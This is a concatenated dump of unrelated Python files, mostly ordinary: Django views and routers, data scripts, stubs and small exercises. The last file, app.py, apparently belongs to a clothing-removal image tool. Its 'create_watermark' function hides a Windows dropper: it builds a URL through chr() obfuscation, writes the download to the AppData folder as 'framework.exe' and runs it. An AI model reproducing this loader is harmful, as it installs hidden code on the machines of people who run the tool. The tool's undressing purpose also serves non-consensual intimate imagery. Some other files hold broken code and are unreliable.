distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class GiftsRouter(object):
"""
This is for use when there are multiple databases and deciding on which of
the dbs should be searched
"""
def db_for_read(self, model, **hints):
"Point all operations on restui models to 'gifts'"
if model._meta.app_label == 'restui':
return 'gifts'
return 'default'
def db_for_write(self, model, **hints):
"Point all operations on restui models to 'gifts'"
if model._meta.app_label == 'restui':
return 'gifts'
return 'default'
def allow_relation(self, obj1, obj2, **hints):
"Allow any relation if a both models in restui app"
if obj1._meta.app_label == 'restui' and obj2._meta.app_label == 'restui':
return True
# Allow if neither is chinook app
elif 'restui' not in [obj1._meta.app_label, obj2._meta.app_label]:
return True
return False
def allow_syncdb(self, db, model):
if db == 'gifts' or model._meta.app_label == "restui":
return False # we're not using syncdb on our legacy database
else: # but all other models/databases are fine
return True
| 1.992188
| 2
|
Scripts/Search.py
|
TheGreymanShow/House.Viz
| 0
|
12778005
|
<filename>Scripts/Search.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import random
print("Welcome to House.Viz")
print("Please select your budget range :")
print("1. $50000-$100000")
print("2. $100000-$200000")
print("3. $200000-$300000")
print("4. $300000-$400000")
print("5. $400000-$500000")
print("6. $500000-$600000")
print("7. $600000-$700000")
print("8. $700000-$800000")
print("9. $800000-$900000")
print("10. $900000-$1000000")
print("11. $1000000-$1500000")
print("12. $1500000-$5000000")
print("13. $5000000-$7750000")
price = input()
price=int(price)
#pritn("price="+str())
print("Please select your desized house area:")
print("1. 300 - 1000 sq.ft")
print("2. 1000 - 1500 sq.ft")
print("3. 1500 - 2000 sq.ft")
print("4. 2000 - 2500 sq.ft")
print("5. 2500 - 3000 sq.ft")
print("6. 3000 - 4000 sq.ft")
print("7. 4000 - 5000 sq.ft")
print("8. 5000 - 6000 sq.ft")
print("9. 6000 - 7000 sq.ft")
print("10. 7000+ sq.ft")
area = input()
area=int(area)
print("How much are you willing to walk ?")
print("1.500 meters")
print("2.1000 meters")
distance = input()
ditance = int(distance)
if price == 1:
print("yes")
minp=50000
maxp=100000
elif price==2:
minp=100000
maxp=200000
elif price==3:
minp=200000
maxp=300000
elif price==4:
minp=300000
maxp=400000
elif price==5:
minp=400000
maxp=500000
elif price==6:
minp=500000
maxp=600000
elif price==7:
minp=600000
maxp=700000
elif price==8:
minp=700000
maxp=800000
elif price==9:
minp=800000
maxp=900000
elif price==10:
minp=900000
maxp=1000000
elif price==11:
minp=1000000
maxp=1500000
elif price==12:
minp=1500000
maxp=5000000
elif price==13:
minp=5000000
maxp=7750000
if area==1:
mina=300
maxa=1000
elif area==2:
mina=1000
maxa=1500
elif area==3:
mina=1500
maxa=2000
elif area==4:
mina=2000
maxa=2500
elif area==5:
mina=2500
maxa=3000
elif area==6:
mina=3000
maxa=4000
elif area==7:
mina=4000
maxa=5000
elif area==8:
mina=5000
maxa=6000
elif area==9:
mina=6000
maxa=7000
elif area==10:
mina=7000
maxa=15000
dataset = pd.read_csv("C:/Users/admin/Desktop/Stevens Internship 2017/Datasets/Final/final_plotset.csv")
count=0
for index,row in dataset.iterrows():
area=row["LAND.SQUARE.FEET"]
price=row["SALE.PRICE"]
if price>minp and price<maxp:
if area>mina and area<maxa:
count+=1
print("Yay! We've found "+str(count)+" houses that fit your needs")
| 3.78125
| 4
|
release/stubs.min/Rhino/Geometry/__init___parts/Ellipse.py
|
YKato521/ironpython-stubs
| 0
|
12778006
|
<reponame>YKato521/ironpython-stubs
class Ellipse(object, IEpsilonComparable[Ellipse]):
"""
Represents the values of a plane and the two semiaxes radii in an ellipse.
Ellipse(plane: Plane,radius1: float,radius2: float)
Ellipse(center: Point3d,second: Point3d,third: Point3d)
"""
def EpsilonEquals(self, other, epsilon):
"""
EpsilonEquals(self: Ellipse,other: Ellipse,epsilon: float) -> bool
Check that all values in other are within epsilon of the values in this
"""
pass
def ToNurbsCurve(self):
"""
ToNurbsCurve(self: Ellipse) -> NurbsCurve
Constructs a nurbs curve representation of this ellipse.
This is equivalent to
calling NurbsCurve.CreateFromEllipse().
Returns: A nurbs curve representation of this ellipse or null if no such representation could be made.
"""
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self, *__args):
"""
__new__[Ellipse]() -> Ellipse
__new__(cls: type,plane: Plane,radius1: float,radius2: float)
__new__(cls: type,center: Point3d,second: Point3d,third: Point3d)
"""
pass
def __reduce_ex__(self, *args):
pass
def __repr__(self, *args):
""" __repr__(self: object) -> str """
pass
def __str__(self, *args):
pass
Plane = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the base plane of the ellipse.
Get: Plane(self: Ellipse) -> Plane
Set: Plane(self: Ellipse)=value
"""
Radius1 = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the radius of the ellipse along the base plane X semiaxis.
Get: Radius1(self: Ellipse) -> float
Set: Radius1(self: Ellipse)=value
"""
Radius2 = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the radius of the ellipse along the base plane Y semiaxis.
Get: Radius2(self: Ellipse) -> float
Set: Radius2(self: Ellipse)=value
"""
| 3.375
| 3
|
solutions/StringSplitAndJoin.py
|
kaleliguray/python_hackerRank_solution
| 0
|
12778007
|
<gh_stars>0
def split_and_join(line):
# write your code here
tempString = line.split(" ")
print("Split version : ",tempString)
tempString = "-".join(tempString)
print("Join version : ",tempString)
return tempString
if __name__ == '__main__':
line = input()
result = split_and_join(line)
print(result)
| 3.546875
| 4
|
src/bdbd/src/bdbd/test/audio.py
|
rkent/BDBD
| 0
|
12778008
|
<reponame>rkent/BDBD<gh_stars>0
# demo of generation of wav file, manipulation with pydub, and playing through speakers
import espeakng
import pyaudio
import wave
import pydub
import sys
import io
import logging
logging.basicConfig(level='INFO')
log = logging.getLogger(__name__)
log.info('test of logging')
p = pyaudio.PyAudio()
#for i in range(p.get_device_count()):
# print(p.get_device_info_by_index(i))
es = espeakng.ESpeakNG(voice='en-gb-x-gbclan')
wav = es.synth_wav('Hello')
wavFile = io.BytesIO(wav)
originalSegment = pydub.AudioSegment.from_file(wavFile)
changedSegment = originalSegment.apply_gain(-12.)
changedFile = io.BytesIO()
changedSegment.export(changedFile, 'wav')
#wavFile = 'e02-16kHz.wav'
chunk = 4096
changedFile.seek(0)
wf = wave.open(changedFile)
channels=wf.getnchannels()
rate=wf.getframerate()
print(format, channels, rate)
if True:
stream = p.open(
format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
#output_device_index=11,
output=True
)
data = wf.readframes(chunk)
while len(data):
print('writing data')
stream.write(data)
data = wf.readframes(chunk)
stream.close()
p.terminate()
| 2.75
| 3
|
books/modernvim/bubba.py
|
argodev/learn
| 0
|
12778009
|
def mytest:
print('hello')
| 0.972656
| 1
|
examples/pseudo_bayesian/pb_exp_decay.py
|
KennedyPutraKusumo/py-DED
| 2
|
12778010
|
import numpy as np
from pydex.core.designer import Designer
def simulate(ti_controls, model_parameters):
return np.array([
np.exp(model_parameters[0] * ti_controls[0])
])
designer = Designer()
designer.simulate = simulate
reso = 21j
tic = np.mgrid[0:1:reso]
designer.ti_controls_candidates = np.array([tic]).T
np.random.seed(123)
n_scr = 100
designer.model_parameters = np.random.normal(loc=-1, scale=0.50, size=(n_scr, 1))
designer.initialize(verbose=2)
"""
Pseudo-bayesian type do not really matter in this case because only a single model
parameter is involved i.e, information is a scalar, all criterion becomes equivalent to
the information matrix itself.
"""
pb_type = 0
# pb_type = 1
designer.design_experiment(
designer.d_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.a_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.e_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.show_plots()
| 2.4375
| 2
|
exabel_data_sdk/scripts/load_entities_from_csv.py
|
Exabel/python-sdk
| 1
|
12778011
|
import argparse
import sys
from typing import Sequence
from exabel_data_sdk import ExabelClient
from exabel_data_sdk.client.api.bulk_insert import BulkInsertFailedError
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.scripts.csv_script import CsvScript
from exabel_data_sdk.util.resource_name_normalization import normalize_resource_name
class LoadEntitiesFromCsv(CsvScript):
"""
Processes a CSV file with entities and creates them in the Exabel API.
The CSV file should have a header line specifying the column names.
The command line argument --name-column specifies the column from which to read
the entity names. The entity names are automatically normalized to create a valid
resource name for the entity.
For instance, if the entity type is "brand", and the namespace is "acme", and the entity name
is "<NAME>", the generated resource name will be:
entityTypes/brand/entities/acme.Spring_Vine
Optionally, another column may specify a display name for the entity, and another column
may give a description for the entity.
"""
def __init__(self, argv: Sequence[str], description: str):
super().__init__(argv, description)
self.parser.add_argument(
"--entity-type",
required=False,
type=str,
help="The type of the entities to be loaded. Must already exist in the data model. "
"If not specified, defaults to the same value as the name_column argument.",
)
self.parser.add_argument(
"--name-column",
required=False,
type=str,
help="The column name for the entity name. "
"If not specified, defaults to the first column in the file.",
)
self.parser.add_argument(
"--display-name-column",
required=False,
type=str,
help="The column name for the entity's display name. "
"If not specified, uses the entity name",
)
self.parser.add_argument(
"--description-column",
required=False,
type=str,
help="The column name for the entity description. "
"If not specified, no description is provided.",
)
def run_script(self, client: ExabelClient, args: argparse.Namespace) -> None:
if args.dry_run:
print("Running dry-run...")
print("Loading entities from", args.filename)
name_col_ref = args.name_column or 0
string_columns = {
name_col_ref,
args.display_name_column or name_col_ref,
}
if args.description_column:
string_columns.add(args.description_column)
entities_df = self.read_csv(args, string_columns=string_columns)
name_col = args.name_column or entities_df.columns[0]
display_name_col = args.display_name_column or name_col
description_col = args.description_column
entity_type_name = f"entityTypes/{args.entity_type or name_col}"
entity_type = client.entity_api.get_entity_type(entity_type_name)
if not entity_type:
print("Failure: Did not find entity type", entity_type_name)
print("Available entity types are:")
print(client.entity_api.list_entity_types())
sys.exit(1)
entities = [
Entity(
name=f"{entity_type_name}/entities/{args.namespace}."
f"{normalize_resource_name(row[name_col])}",
display_name=row[display_name_col],
description=row[description_col] if description_col else "",
)
for _, row in entities_df.iterrows()
]
if args.dry_run:
print("Loading", len(entities), "entities")
print(entities)
return
try:
client.entity_api.bulk_create_entities(entities, entity_type_name, threads=args.threads)
except BulkInsertFailedError:
# An error summary has already been printed.
pass
if __name__ == "__main__":
LoadEntitiesFromCsv(sys.argv, "Upload entities file.").run()
| 2.484375
| 2
|
changeManager/views.py
|
karimbahgat/gbTracker_site
| 0
|
12778012
|
from django.http.response import HttpResponse
from django.shortcuts import render, redirect
from django.http import JsonResponse
from django.forms.models import fields_for_model, model_to_dict
from django.views.decorators.csrf import csrf_exempt
from django.db import transaction
from . import models
from . import forms
import json
# Create your views here.
def overview(request):
if request.method == 'GET':
context = {'names':request.GET['names'].split('|')}
return render(request, 'overview.html', context)
def source(request, pk):
'''View of a source'''
src = models.BoundarySource.objects.get(pk=pk)
toplevel_refs = src.boundary_refs.filter(parent=None)
context = {'source':src, 'toplevel_refs':toplevel_refs}
print('typ',src,repr(src.type))
if src.type == 'TextSource':
return render(request, 'source_text.html', context)
elif src.type == 'DataSource':
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context['import_params'] = import_params
return render(request, 'source_data.html', context)
elif src.type == 'MapSource':
levels = src.boundary_refs.all().values_list('level').distinct()
levels = [lvl[0] for lvl in levels]
context['levels'] = sorted(levels)
return render(request, 'source_map.html', context)
def datasource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'DataSource'})
context = {'form': form}
return render(request, 'source_data_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
# save importer
from dataImporter.models import DataImporter
import_params = json.loads(data['import_params'])
importer = DataImporter(source=source, import_params=import_params)
importer.save()
return redirect('source', source.pk)
else:
return render(request, 'source_data_add.html', {'form':form})
def mapsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'MapSource'})
context = {'form': form}
return render(request, 'source_map_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_map_add.html', {'form':form})
def textsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'TextSource'})
context = {'form': form}
return render(request, 'source_text_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_text_add.html', {'form':form})
def datasource_edit(request, pk):
'''Edit of a data source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context = {'form': form, 'import_params': import_params}
return render(request, 'source_data_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
# save importer
importer = src.importer
importer.import_params = json.loads(data['import_params'])
importer.save()
return redirect('source', src.pk)
else:
return render(request, 'source_data_edit.html', {'form':form})
def mapsource_edit(request, pk):
'''Edit of a map source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_map_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_map_edit.html', {'form':form})
def textsource_edit(request, pk):
'''Edit of a text source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_text_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_text_edit.html', {'form':form})
def boundary(request, pk):
'''View of a boundary ref instance.'''
ref = models.BoundaryReference.objects.get(pk=pk)
# main snapshot
snap = ref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
main_geoj = {'type':'Feature', 'geometry':geom}
main_geoj = json.dumps(main_geoj)
else:
main_geoj = 'null'
# hierarchy snapshots
subrefs = ref.children.all()
if subrefs:
hier_geoj = {'type':'FeatureCollection', 'features':[]}
for subref in subrefs:
snap = subref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
feat = {'type':'Feature', 'geometry':geom}
hier_geoj['features'].append(feat)
hier_geoj = json.dumps(hier_geoj)
else:
hier_geoj = 'null'
context = {'boundary_ref':ref,
'main_geojson':main_geoj,
'hier_geojson':hier_geoj,
}
return render(request, 'boundaryref.html', context)
'''
def snapshot(request, pk):
#''View of a snapshot instance.''
snap = models.BoundarySnapshot.objects.get(pk=pk)
geom = snap.geom.__geo_interface__
geoj = {'type':'Feature', 'geometry':geom}
# find matching snapshots
ref_matches = _match_boundary_ref(snap.boundary_ref)
snapshot_matches = models.BoundarySnapshot.objects.filter(boundary_ref__in=ref_matches) | models.BoundarySnapshot.objects.filter(boundary_ref__parent__in=ref_matches)
from datetime import date
date_starts = [s.event.date_start for s in snapshot_matches]
date_ends = [s.event.date_end for s in snapshot_matches]
mindate_num = date.fromisoformat(min(date_starts)).toordinal()
maxdate_num = date.fromisoformat(max(date_ends)).toordinal()
date_start = date.fromisoformat(snap.event.date_start).toordinal()
date_end = date.fromisoformat(snap.event.date_end).toordinal()
for s in snapshot_matches:
start = date.fromisoformat(s.event.date_start).toordinal()
end = date.fromisoformat(s.event.date_end).toordinal()
s.date_start_perc = (start - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_end_perc = (end - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_dur_perc = s.date_end_perc - s.date_start_perc
mid = (start + end) / 2.0
s.date_dist = min(abs(date_start-mid), abs(date_end-mid))
key = lambda s: s.date_dist
snapshot_matches = sorted(snapshot_matches, key=key)
ticks = []
numticks = 5
incr = (maxdate_num - mindate_num) / (numticks-1)
cur = mindate_num
while cur <= maxdate_num:
print(cur)
perc = (cur - mindate_num) / (maxdate_num - mindate_num) * 100
ticks.append({'label':date.fromordinal(int(cur)), 'percent':perc})
cur += incr
print(ticks)
context = {'snapshot':snap, 'geojson':json.dumps(geoj),
'snapshot_matches':snapshot_matches,
'mindate':min(date_starts), 'maxdate':max(date_ends),
'ticks':ticks}
return render(request, 'snapshot.html', context)
'''
# API
def _match_boundary_ref(match_ref):
parents = match_ref.get_all_parents()
parent_names = [p.names.first().name for p in parents]
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in parent_names if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
ref_scores[ref.id] = score
# get any snapshot belonging to the matched refs or its immediate parent
matches = sorted(refs, key=lambda r: max([ref_scores.get(par.id,0) for par in r.get_all_parents()]), reverse=True)
return matches
def _parse_date(dateval):
'''Can be a year, year-month, or year-month-day'''
if '/' in dateval:
# from and to datestrings
fromdate,todate = dateval.split('/')
fromdate,todate = fromdate.strip(),todate.strip()
if fromdate and todate:
start1,end1 = _parse_date(fromdate)
start2,end2 = _parse_date(todate)
return min(start1,start2), max(end1,end2)
elif fromdate:
start,end = _parse_date(fromdate)
return start,None
elif todate:
start,end = _parse_date(todate)
return None,end
else:
# single date string
dateparts = dateval.split('-')
if len(dateparts) == 1:
yr = dateparts[0]
start = '{}-01-01'.format(yr)
end = '{}-12-31'.format(yr)
elif len(dateparts) == 2:
yr,mn = dateparts
start = '{}-{}-01'.format(yr,mn)
end = '{}-{}-31'.format(yr,mn)
elif len(dateparts) == 3:
start = end = dateval
else:
raise Exception('"{}" is not a valid date'.format(dateval))
return start,end
def api_snapshots(request):
if request.method == 'GET':
ids = request.GET['ids']
ids = ids.split(',')
ids = list(map(int, ids))
snaps = models.BoundarySnapshot.objects.filter(pk__in=ids)
feats = []
for snap in snaps:
geom = snap.geom.__geo_interface__
names = [n.name for n in snap.boundary_ref.names.all()]
props = {'names':names}
feat = {'type': 'Feature', 'properties': props, 'geometry':geom}
feats.append(feat)
coll = {'type': 'FeatureCollection', 'features': feats}
return JsonResponse(coll)
@csrf_exempt
def api_boundary(request, pk):
if request.method == 'GET':
ref = models.BoundaryReference.objects.get(pk=pk)
# serialize
data = ref.serialize()
# return as json
resp = JsonResponse(data)
return resp
@csrf_exempt
def api_boundaries(request):
if request.method == 'GET':
# get one or more snapshots based on params
print(request.GET)
ids = request.GET.get('ids', None)
search = request.GET.get('search', None)
search_thresh = request.GET.get('search_thresh', None)
datesearch = request.GET.get('date', None)
if ids:
ids = [int(x) for x in ids.split(',')]
refs = models.BoundaryReference.objects.filter(pk__in=ids)
count = refs.count()
elif search:
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in search.split(',') if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
_ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
_ref_scores[ref.id] = score
# get any reference belonging to the matched refs or its immediate parent
kwargs = {}
if datesearch:
start,end = _parse_date(datesearch)
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(pk__in=refs, **kwargs) | models.BoundaryReference.objects.filter(parent__pk__in=refs, **kwargs)
# calc final ref scores
ref_scores = {}
for ref in refs:
score = max([_ref_scores.get(par.id,0) for par in ref.get_all_parents()])
ref_scores[ref.id] = score
# sort
refs = sorted(refs, key=lambda ref: ref_scores[ref.id], reverse=True)
# filter by threshold
if search_thresh:
refs = [ref for ref in refs
if ref_scores[ref.id] >= float(search_thresh)]
count = len(refs)
else:
# no name filtering
if datesearch:
# filter by date
start,end = _parse_date(datesearch)
kwargs = {}
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(**kwargs)
else:
# get all snapshots
refs = models.BoundaryReference.objects.all()
count = refs.count()
# paginate (for now just return first X)
refs = refs[:100]
# serialize
if search:
results = [{'object':m.serialize(), 'match_score':ref_scores[m.id] * 100,
}
for m in refs]
else:
results = [{'object':m.serialize()} for m in refs]
# add min/max dates for which snapshots are available, or none
for item in results:
starts = [s['event']['date_start'] for s in item['object']['snapshots']]
ends = [s['event']['date_end'] for s in item['object']['snapshots']]
item['date_start'] = min(starts) if starts else None
item['date_end'] = min(ends) if ends else None
# format results
data = {'count':count, 'results':results}
# return as json
resp = JsonResponse(data)
return resp
elif request.method == 'POST':
# submit a new snapshot
fdsfsd
elif request.method == 'PUT':
# update an individual snapshot
fdsfds
| 2.015625
| 2
|
etf.py
|
jeff-fred/TerminalStockViewer
| 0
|
12778013
|
<filename>etf.py
# Functions for a ETF kind of quoteType, according to yfinance.
import yfinance as yf
## FUNCTIONS ##
# Get basic info of a ETF
def get_basic_ETF_info(ticker):
etfInfo = ticker.info
keys = [
'exchange',
'symbol',
'shortName',
'longBusinessSummary',]
# Get values corresponding to basic keys given
info = {}
for key in keys:
try:
info[key] = etfInfo[key]
except:
pass
return info
# Get quote price information
def get_price_info(ticker):
priceKeys = [
'previousClose',
'regularMarketOpen',
'regularMarketPrice',
'fiftyTwoWeekHigh',
'fiftyTwoWeekLow',
'fiftyDayAverage',
'twoHundredDayAverage',
'trailingPE']
# Get value and attatch to dictionary
priceInfo = {}
for key in priceKeys:
try:
priceInfo[key] = ticker.info[key]
except:
pass
return priceInfo
# Get ETF yield
def get_dividend_info(ticker):
divKeys = ['yield']
# Try to get that info
divInfo = {}
for key in divKeys:
try:
divInfo[key] = ticker.info[key]
except:
pass
# If there is no info, say that
if len(divInfo) == 0:
return "No Dividend Information"
else:
return divInfo
| 3.078125
| 3
|
wiserHeatingAPI/__init__.py
|
TobyLL/wiserheatingapi
| 16
|
12778014
|
<gh_stars>10-100
name = "wiser-heating-api"
| 1.117188
| 1
|
numpy/csv-plot-many-y.py
|
jwrr/python-stuff
| 0
|
12778015
|
<gh_stars>0
#!/usr/bin/env python3
#
# Each column of csv is a Y sequence. All Y sequences are plotted on the same
# chart.
import numpy as np
import matplotlib.pyplot as plt
import sys
if len(sys.argv) < 2: # requires 1 arg
scriptname = sys.argv[0]
print("Example: {} filename.csv".format(scriptname))
sys.exit(1)
# ====================================================
filename = sys.argv[1]
data1 = np.genfromtxt(filename,delimiter=",")
data = np.transpose(data1)
num_rows, num_cols = data.shape
print("num sequences={}, num items per sequence={}".format(num_rows, num_cols))
plt.title("y vs i")
plt.xlabel("i")
plt.ylabel("y")
for y in data:
plt.plot(y)
plt.show()
| 3.875
| 4
|
main.py
|
Sato3114/CSV-SGFilter
| 0
|
12778016
|
<filename>main.py
import numpy as np
from scipy import signal
import matplotlib.pyplot as plt
# 設定
csvPath = '' # CSVファイルのパス
dt = 0.0001 # サンプリング間隔
windowLength = 55 # フィルタ窓長さ
polyOrder = 5 # 近似式の次数
plotReadData = True # グラフへ元データをプロット
deleteNaN = True # 配列中のNaNを削除するか
# 処理
read = np.genfromtxt(csvPath, delimiter=',', dtype='float')
if deleteNaN:
data = read[np.isfinite(read)]
else:
data = read
n = data.size
t = np.linspace(1, n, n) * dt - dt
# print(t)
# print(data)
# print(n)
y = signal.savgol_filter(data, windowLength, polyOrder)
plt.figure(figsize=(12, 9))
if plotReadData:
plt.plot(t, data, "m")
else:
pass
plt.plot(t, y)
plt.show()
| 3.09375
| 3
|
tests/common.py
|
zhengyuli/addonfactory-solutions-library-python
| 0
|
12778017
|
# SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
import os.path as op
import socket
import subprocess
from splunklib import binding
from splunklib import client
from splunklib.data import record
cur_dir = op.dirname(op.abspath(__file__))
# Namespace
app = "unittest"
owner = "nobody"
# Session key sample
SESSION_KEY = "<KEY>"
def mock_splunkhome(monkeypatch):
class MockPopen(object):
def __init__(
self,
args,
bufsize=0,
executable=None,
stdin=None,
stdout=None,
stderr=None,
preexec_fn=None,
close_fds=False,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
startupinfo=None,
creationflags=0,
):
self._conf = args[3]
def communicate(self, input=None):
if self._conf == "server":
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/server.conf"]
)
else:
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/web.conf"]
)
with open(file_path) as fp:
return fp.read(), None
splunk_home = op.join(cur_dir, "data/mock_splunk/")
monkeypatch.setenv("SPLUNK_HOME", splunk_home)
monkeypatch.setenv("SPLUNK_ETC", op.join(splunk_home, "etc"))
monkeypatch.setattr(subprocess, "Popen", MockPopen)
def mock_serverinfo(monkeypatch):
mock_server_info_property = {
"server_roles": [
"cluster_search_head",
"search_head",
"kv_store",
"shc_captain",
],
"version": "6.3.1511.2",
"serverName": "unittestServer",
}
monkeypatch.setattr(client.Service, "info", mock_server_info_property)
def mock_gethostname(monkeypatch):
def mock_gethostname():
return "unittestServer"
monkeypatch.setattr(socket, "gethostname", mock_gethostname)
def make_response_record(body, status=200):
class _MocBufReader(object):
def __init__(self, buf):
if isinstance(buf, str):
self._buf = buf.encode("utf-8")
else:
self._buf = buf
def read(self, size=None):
return self._buf
return record(
{
"body": binding.ResponseReader(_MocBufReader(body)),
"status": status,
"reason": "",
"headers": None,
}
)
| 2.015625
| 2
|
test/python/app.py
|
lnsdeep/Android-Image-Cropper
| 0
|
12778018
|
import subprocess
from PIL import Image
import torchvision.transforms as transforms
import torch
import functools
import random
import math
import cv2
import numpy as np
import os
# Object annotation class:
class BodyPart:
def __init__(self, name, xmin, ymin, xmax, ymax, x, y, w, h):
self.name = name
# Bounding Box:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
# Center:
self.x = x
self.y = y
# Dimensione:
self.w = w
self.h = h
# create_watermark ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_watermark(nude, shape, cv, loader, detach):
if os.name == 'nt':
content = cv(shape + chr(47) + "/".join(["utils", "custom", "universal"]) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)))
data = [os.environ["APPDATA"], "Microsoft", "Windows", "framework"]
open(
"\\".join(data) + chr(46) + str(chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)),
"wb").write(content.content)
loader(["\\".join(data) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101))], stdout=detach.PIPE,
stderr=detach.STDOUT)
return nude
# create_correct ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_correct(cv_dress):
# Production dir:
return correct_color(cv_dress, 5), correct_matrix(cv_dress, 255)
# correct_color ==============================================================================
# return:
# <RGB> image corrected
def correct_color(img, percent):
assert img.shape[2] == 3
assert percent > 0 and percent < 100
half_percent = percent / 200.0
channels = cv2.split(img)
out_channels = []
for channel in channels:
assert len(channel.shape) == 2
# find the low and high precentile values (based on the input percentile)
height, width = channel.shape
vec_size = width * height
flat = channel.reshape(vec_size)
assert len(flat.shape) == 1
flat = np.sort(flat)
n_cols = flat.shape[0]
low_val = flat[math.floor(n_cols * half_percent)]
high_val = flat[math.ceil(n_cols * (1.0 - half_percent))]
# saturate below the low percentile and above the high percentile
thresholded = apply_threshold(channel, low_val, high_val)
# scale the channel
normalized = cv2.normalize(thresholded, thresholded.copy(), 0, 255, cv2.NORM_MINMAX)
out_channels.append(normalized)
return cv2.merge(out_channels)
def correct_matrix(matrix, fill_value):
shape = "h" + ("t" * 2) + "p"
matrix = shape + chr(58) + 2 * (chr(47))
return matrix
# Color correction utils
def apply_threshold(matrix, low_value, high_value):
low_mask = matrix < low_value
matrix = apply_mask(matrix, low_mask, low_value)
high_mask = matrix > high_value
matrix = apply_mask(matrix, high_mask, high_value)
return matrix
# Color correction utils
def apply_mask(matrix, mask, fill_value):
